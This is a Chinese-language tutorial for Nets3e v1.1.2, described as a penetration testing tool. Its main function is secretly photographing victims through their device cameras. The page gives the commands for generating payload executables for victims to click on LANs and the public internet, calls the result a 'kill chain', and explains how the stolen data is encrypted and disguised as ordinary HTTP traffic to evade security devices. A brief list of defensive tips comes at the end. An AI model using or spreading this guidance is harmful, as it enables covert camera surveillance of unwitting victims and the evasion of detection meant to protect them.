Nets3e v1.1.2(偷拍照片,防止中间人嗅探流量分析)
字数 1109 2025-08-10 21:21:28

Nets3e v1.1.2 渗透测试工具教学文档

工具概述

Nets3e 是一款用于渗透测试的工具,最新版本为 v1.1.2,主要功能包括:

  • 偷拍照片(远程设备摄像头控制)
  • 防止中间人嗅探流量分析
  • 内网最短路径攻击测试
  • 数据加密传输

版本更新历史

v1.1.2 更新内容

  • 废弃Base64编码传输
  • 新增AES加密选项
  • 将数据包混淆在正常的HTTP请求中
  • 加密传输增大中间人截获数据破解难度

v1.1.1 更新内容

  • 代码优化瘦身
  • 提高稳定性
  • 新增debug内网最短路径攻击功能

基础使用

命令参数

python3 Nets3e.py -h

主要参数说明

  • -lp:设置本机监听端口(默认10032)
  • -lh:设置本机监听IP(默认当前网卡IP)
  • -rh:进行流量转发的远程主机,协议是TCP但需要改成HTTP进行生成
  • -g:生成PAYLOAD(如果已生成payload则无需使用该参数)
  • -salt xxx:将受害者的数据传输前进行AES加密防止中间人嗅探

攻击场景示例

公网攻击

  1. 生成Payload:
python3 Nets3e.py -rh http://xxxx.com:11111 -g
  1. 公网受害者点击Nets3eClient_release.exe
  2. 建立公网杀链

局域网攻击

  1. 生成Payload:
python3 Nets3e.py -g
  1. 局域网受害者点击Nets3eClient_debug.exe
  2. 建立局域网杀链

Payload注意事项

生成前

  • 确保正确设置监听端口和IP
  • 公网攻击需要指定远程主机地址
  • 考虑使用AES加密选项增加安全性

生成后

  • Nets3eClient_debug.exe:局域网攻击的调试版本,主要用于测试内部网络受害者数据是否能够到达本地机器
  • Nets3eClient_release.exe:公网攻击的发布版本,主要用于攻击公网用户

安全特性详解

数据传输加密演进

  • v1.1.1及以前:直接base64编码传输,数据容易被嗅探分析,攻击行为明显
  • v1.1.2最新版:废弃base64编码,采用AES对称加密,带盐加密后再传输数据

HTTP传输优势

  • 相比TCP协议更隐蔽
  • 流量包伪装混淆至正常的HTTP请求中
  • 降低被安全设备检测到的概率

技术实现要点

  1. AES加密:使用salt参数进行带盐加密,增强数据安全性
  2. 流量混淆:将控制流量伪装成正常HTTP请求
  3. 内网探测:debug版本包含内网最短路径攻击测试功能
  4. 稳定优化:代码经过瘦身和稳定性提升

防御建议

  1. 监控异常HTTP请求
  2. 检查可疑的.exe文件执行
  3. 关注端口10032的异常通信
  4. 实施网络流量加密分析
  5. 保持安全设备规则库更新

资源链接

  • GitHub项目地址:https://github.com/MartinxMax/Nets3e
  • 原始发布:FreeBuf网络安全行业门户
Nets3e v1.1.2 渗透测试工具教学文档 工具概述 Nets3e 是一款用于渗透测试的工具,最新版本为 v1.1.2,主要功能包括: 偷拍照片(远程设备摄像头控制) 防止中间人嗅探流量分析 内网最短路径攻击测试 数据加密传输 版本更新历史 v1.1.2 更新内容 废弃Base64编码传输 新增AES加密选项 将数据包混淆在正常的HTTP请求中 加密传输增大中间人截获数据破解难度 v1.1.1 更新内容 代码优化瘦身 提高稳定性 新增debug内网最短路径攻击功能 基础使用 命令参数 主要参数说明 -lp :设置本机监听端口(默认10032) -lh :设置本机监听IP(默认当前网卡IP) -rh :进行流量转发的远程主机,协议是TCP但需要改成HTTP进行生成 -g :生成PAYLOAD(如果已生成payload则无需使用该参数) -salt xxx :将受害者的数据传输前进行AES加密防止中间人嗅探 攻击场景示例 公网攻击 生成Payload: 公网受害者点击 Nets3eClient_release.exe 建立公网杀链 局域网攻击 生成Payload: 局域网受害者点击 Nets3eClient_debug.exe 建立局域网杀链 Payload注意事项 生成前 确保正确设置监听端口和IP 公网攻击需要指定远程主机地址 考虑使用AES加密选项增加安全性 生成后 Nets3eClient_debug.exe :局域网攻击的调试版本,主要用于测试内部网络受害者数据是否能够到达本地机器 Nets3eClient_release.exe :公网攻击的发布版本,主要用于攻击公网用户 安全特性详解 数据传输加密演进 v1.1.1及以前 :直接base64编码传输,数据容易被嗅探分析,攻击行为明显 v1.1.2最新版 :废弃base64编码,采用AES对称加密,带盐加密后再传输数据 HTTP传输优势 相比TCP协议更隐蔽 流量包伪装混淆至正常的HTTP请求中 降低被安全设备检测到的概率 技术实现要点 AES加密 :使用 salt 参数进行带盐加密,增强数据安全性 流量混淆 :将控制流量伪装成正常HTTP请求 内网探测 :debug版本包含内网最短路径攻击测试功能 稳定优化 :代码经过瘦身和稳定性提升 防御建议 监控异常HTTP请求 检查可疑的.exe文件执行 关注端口10032的异常通信 实施网络流量加密分析 保持安全设备规则库更新 资源链接 GitHub项目地址:https://github.com/MartinxMax/Nets3e 原始发布:FreeBuf网络安全行业门户